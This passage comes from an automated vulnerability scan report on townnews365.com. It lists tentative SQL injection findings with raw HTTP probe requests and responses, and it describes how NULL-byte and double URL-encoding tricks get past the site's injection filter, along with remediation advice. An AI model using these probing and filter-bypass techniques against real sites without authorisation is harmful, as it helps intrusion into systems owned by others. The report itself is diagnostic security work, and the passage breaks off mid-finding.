NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mobile/article_1997dfba-5afa-11e0-a3fd-001cc4c03286.html HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /mobile/article_1997dfba-5afa-11e0-a3fd-001cc4c03286.html HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:27 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.50. http://www.townnews365.com/search/ [f parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /search/

Issue detail

The f parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the f parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /search/?q=&t=article&l=100&d=&d1=&d2=&s=start_time&sd=desc&c[]=content_management_solutions/blogs,content_management_solutions/blogs/*&f=rss' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /search/?q=&t=article&l=100&d=&d1=&d2=&s=start_time&sd=desc&c[]=content_management_solutions/blogs,content_management_solutions/blogs/*&f=rss'' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:41:49 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.51. http://www.townnews365.com/shared-content/swfobject/swfobject.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /shared-content/swfobject/swfobject.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /shared-content%00'/swfobject/swfobject.js HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/content_management_solutions/about_blox/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /shared-content%00''/swfobject/swfobject.js HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/content_management_solutions/about_blox/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:41:52 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.52. http://www.townnews365.com/shopping_solutions/yp_top_ads/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /shopping_solutions/yp_top_ads/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /shopping_solutions/yp_top_ads/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /shopping_solutions/yp_top_ads/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3840420
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:45:42 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.4831
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp13
Content-Length: 43870
Connection: close
X-Cache-Info: cached


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.53. http://www.townnews365.com/shopping_solutions/yp_top_ads/demonstration/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /shopping_solutions/yp_top_ads/demonstration/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shopping_solutions/yp_top_ads/demonstration/?1'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /shopping_solutions/yp_top_ads/demonstration/?1''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3643020
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:43:45 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.5299
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp7
Content-Length: 40844


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.54. http://www.townnews365.com/site/affiliates/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /site/affiliates/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /site/affiliates/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /site/affiliates/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:41:19 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.55. http://www.townnews365.com/site/affiliates/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /site/affiliates/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /site/affiliates/?1%00'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /site/affiliates/?1%00''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:41:10 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.56. http://www.townnews365.com/site/customers [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /site/customers

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /site'/customers HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /site''/customers HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:42:11 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.57. http://www.townnews365.com/site/customers/editorial/editorial-core-base/resources/images/user_70.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /site/customers/editorial/editorial-core-base/resources/images/user_70.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /site/customers'/editorial/editorial-core-base/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /site/customers''/editorial/editorial-core-base/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:41:53 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.58. http://www.townnews365.com/site/customers/global/resources/styles/print.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /site/customers/global/resources/styles/print.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /site/customers/global/resources'/styles/print.css HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /site/customers/global/resources''/styles/print.css HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:41:48 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.59. http://www.townnews365.com/tncms/ads/[random_number]/center-bottom1/3/18/2d9/3182d9b8-a61e-11df-a867-001cc4c002e0-revisions/4c640596327b6.image.png [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/center-bottom1/3/18/2d9/3182d9b8-a61e-11df-a867-001cc4c002e0-revisions/4c640596327b6.image.png

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /tncms/ads/[random_number]/center-bottom1/3/18/2d9/3182d9b8-a61e-11df-a867-001cc4c002e0-revisions/4c640596327b6.image.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/center-bottom1/3/18/2d9/3182d9b8-a61e-11df-a867-001cc4c002e0-revisions/4c640596327b6.image.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:18 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.60. http://www.townnews365.com/tncms/ads/[random_number]/center-top1/2/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/center-top1/2/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /tncms/ads/[random_number]/center-top1/2%2527/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/center-top1/2%2527%2527/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:49 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.61. http://www.townnews365.com/tncms/ads/[random_number]/center-top1/2/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/center-top1/2/8d/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /tncms/ads/[random_number]/center-top1/2/8d%00'/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/center-top1/2/8d%00''/dd5/28ddd5ca-0d20-11df-8410-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:54 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.62. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/4/06/bd5/406bd50c-5f87-11df-a0e1-001cc4c002e0.image.gif [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/4/06/bd5/406bd50c-5f87-11df-a0e1-001cc4c002e0.image.gif

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/4/06/bd5/406bd50c-5f87-11df-a0e1-001cc4c002e0.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/4/06/bd5/406bd50c-5f87-11df-a0e1-001cc4c002e0.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:17 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.63. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/5/84/536/58453682-465a-11df-b231-001cc4c03286.image.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/5/84/536/58453682-465a-11df-b231-001cc4c03286.image.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/5/84/536/58453682-465a-11df-b231-001cc4c03286.image.gif?1'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/5/84/536/58453682-465a-11df-b231-001cc4c03286.image.gif?1''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:52 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.64. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/5/c1/f1b/5c1f1b0e-3e7d-11df-9dd9-001cc4c03286.image.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/5/c1/f1b/5c1f1b0e-3e7d-11df-9dd9-001cc4c03286.image.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/5/c1/f1b/5c1f1b0e-3e7d-11df-9dd9-001cc4c03286.image.gif?1%2527=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/5/c1/f1b/5c1f1b0e-3e7d-11df-9dd9-001cc4c03286.image.gif?1%2527%2527=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:56 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.65. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/7/71/51c/77151cee-465a-11df-b20f-001cc4c03286.image.jpg [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/7/71/51c/77151cee-465a-11df-b20f-001cc4c03286.image.jpg

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/7/71/51c/77151cee-465a-11df-b20f-001cc4c03286.image.jpg HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/7/71/51c/77151cee-465a-11df-b20f-001cc4c03286.image.jpg HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:10 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.66. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/8'/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

